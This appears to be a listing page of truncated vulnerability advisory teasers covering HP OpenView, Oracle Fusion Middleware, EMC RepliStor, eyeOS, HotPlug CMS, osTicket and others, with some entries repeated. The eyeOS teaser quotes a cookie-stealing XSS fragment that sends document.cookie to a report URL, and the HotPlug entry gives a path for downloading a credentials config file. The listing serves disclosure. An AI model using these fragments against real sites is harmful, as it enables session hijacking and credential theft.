HP OpenView Network Node Manager OVBuildPath Overflow

Added: 02/20/2012 CVE: CVE-2011-3167 BID: 50471 OSVDB: 76775 Background HP OpenView Network Node Manager NNM is a network monitoring solution based on SNMP. Problem User supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overfl...

HP OpenView Network Node Manager OVBuildPath Overflow

Added: 02/20/2012 CVE: CVE-2011-3167 BID: 50471 OSVDB: 76775 Background HP OpenView Network Node Manager NNM is a network monitoring solution based on SNMP. Problem User supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overfl...

HP OpenView Network Node Manager OVBuildPath Overflow

Added: 02/20/2012 CVE: CVE-2011-3167 BID: 50471 OSVDB: 76775 Background HP OpenView Network Node Manager NNM is a network monitoring solution based on SNMP. Problem User supplied data from the NNM web interface is passed to the OVBuildPath function in ov.dll. This function contains a stack overfl...

DOLE website vulnerable to hackers !

DOLE website vulnerable to hackers! A hacker with Codename "No.One " release some vulnerability regarding DOLE via a pastebin post. We analyse it & Explaining the possible Security Breach. Hackers Find a vulnerable site on 125.5.39.135 , which having two domains on it : https://www.dole.gov.ph/...

eyeOS Shell Upload / Cross Site Scripting

A few weeks ago, an exploit for an increasingly more popular open source OS on http://www.exploit-db.com/exploits/17220/ was made public, it was titled 'eyeOS var http = new XMLHttpRequest var url = "http://localhost/report.php?" + "user=" + top.document.title + "&cookie=" + document.cookie;...

EgY SpIdEr ShElL : Shell strongest in the history the hacker !

Sites get hacked every day. The bad guys often install a toolkit to control remote servers effectively. Here is one called EgY SpIdEr ShElL: When logging in, you get a quick overview of the machine with what services are running, as well as some hardware specs.: The toolkit provides you with...

Особенности реализации PHP include.

Особенности реализации PHP Include. Введение. В данной заметке, я попытался объединить в одном месте все фичи, найденные в последнее время и позволяющие повысить эффективность атаки на основе PHP Include. Основы. Внедрение PHP-кода PHP Include — это уязвимость, заключающаяся в возможности внедрен...

Design/Logic Flaw

Unspecified vulnerability in the Application Server Control component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2010-0081...

CVE-2010-2381

CVE-2010-2381 affects Oracle Fusion Middleware Application Server Control, versions 10.1.2.3 and 10.1.4.0.1. The vulnerability allows remote attackers with a valid session to impact integrity via unknown vectors (Network, requires authentication per Oracle risk matrices). No public exploit detail...

Design/Logic Flaw

Unspecified vulnerability in the Application Server Control component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2381...

CVE-2010-0081

Unspecified vulnerability in the Application Server Control component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2381...

CVE-2010-0081

Unspecified vulnerability in the Application Server Control component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2381...

EMC RepliStor远程堆溢出漏洞

BUGTRAQ ID: 27915 CVECAN ID: CVE-2008-6426 EMC RepliStor是实时容灾备份解决方案。 EMC RepliStor处理畸形请求数据时存在漏洞，远程攻击者可能利用此漏洞控制服务器。 EMC RepliStor中负责执行压缩的代码未经考虑目标缓冲区的大小便解压了数据，这可能触发堆溢出，导致以RepliStor Server或Control Server的权限（通常为SYSTEM）执行任意指令。攻击者无需认证便可以触发这些漏洞，但必须要能够连接到目标服务器的TCP 7144或7145端口。 EMC RepliStor 6.2 SP2 厂商补丁：...

GE-Fanuc Proficy Real-Time Information Portal远程脚本上传及执行漏洞

BUGTRAQ ID: 27446 CVECAN ID: CVE-2008-0175 Proficy Real-Time Information Portal是一个基于Web的解决方案，将基于在线和过程的系统与厂级连接性、分析和人机界面器件集成起来。 Proficy Real-Time Information Portal在处理用户请求时存在漏洞，远程攻击者可能利用此漏洞控制服务器。 Proficy Real-Time Information Portal没有对Add WebSource执行正确的Java...

Talking about the CMD turned on under the Remote Desktop Services-vulnerability warning-the black bar safety net

This article has been published in the hacker X file of the first 7 issues of the magazine on One, the origin Close paragraph of time, Microsoft appears DNS overflow vulnerability crazy a period of time, is now also there are many server can successfully overflow. I believe we all have experience...

Toribash多个拒绝服务及远程代码执行漏洞

BUGTRAQ ID: 25359 Toribash是一款流行的格斗游戏。 Toribash中存在多个远程漏洞，远程攻击者可能利用这些漏洞控制服务器。 --------------------------------- A 专用服务器格式串漏洞 --------------------------------- 如果客户端在加入游戏的时候直接向vfprintf发送了包含有BOUT ID; 1 0 0 0 0 0 NICKNAME 0的格式串，就可能导致服务器崩溃或执行任意指令。 ---------------------------------- B 客户端命令缓冲区溢出...

CVE-2003-1333

InterSystems Cache CSP in Cache versions 4.0.3–5.0.5 is described as having an unspecified vulnerability that allows remote attackers to gain complete control of the server. The provided documents do not specify the root cause, affected components beyond CSP, exploit details, or remediation guida...

Perforce client insecure design

Server has full control under client...

HotPlug CMS Config File Include Vulnerability

Hello HotPlug CMS Config File Include Vulnerability Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : [email protected] After Script Url Add includes/class/config.inc And you will download the config file ,, so that you will be able to connect by remote connect...

osTicketSQL.txt

GulfTech Security Research May 2nd, 2005 Vendor : osTicket URL : http://www.osticket.com/ Version : All Versions Risk : Multiple Vulnerabilities Description: osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting...